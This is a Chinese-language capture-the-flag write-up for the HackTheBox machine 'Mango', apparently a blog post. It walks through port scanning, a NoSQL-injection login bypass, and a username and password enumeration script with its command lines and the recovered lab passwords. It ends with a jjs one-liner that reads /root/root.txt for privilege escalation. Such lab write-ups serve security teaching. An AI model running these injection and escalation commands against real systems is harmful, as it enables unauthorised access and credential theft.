HackTheBox::Mango

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.162
image.png
nmap -Pn -sCV -p 22,80,443 10.10.10.162
image.png
访问80端口提示403,访问443端口是一个搜索功能,经测试没有可利用的地方。
通过查看网站证书,得到一个子域名:staging-order.mango.htb
image.png
把staging-order.mango.htb添加到hosts文件中,可以访问该子域看到一个登录界面。
image.png

0x01 漏洞利用

登录处尝试SQL注入,失败
image.png
通过google查找关于MongoDB的注入,发现大部分内容与NoSQL注入有关。
https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#mongodb-payloads
使用payload成功绕过登录。
image.png
进入后台后,并未发现可利用信息。
image.png
在github中找到一个nosql的枚举利用脚本
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login -m post

得到两个用户名:admin、mango
image.png

python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep password -op login:login -m post

得到密码:h3mXK8RhU~f{]f5H、t9KcS3>!0B#2
image.png
通过ssh登录尝试,mango用户可以成功登录,但权限较低。
image.png
admin用户无法使用ssh登录,尝试使用su提升到admin用户
image.png
成功获得user.txt

0x02 权限提升

image.png
上传linpeas.sh至目标机器进行枚举
image.png
https://gtfobins.github.io/gtfobins/jjs/
直接使用File read读取root.txt文件即可

echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }' | jjs

image.png
其他利用方式:
利用Write file写入ssh_key或者写入/etc/passwd

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值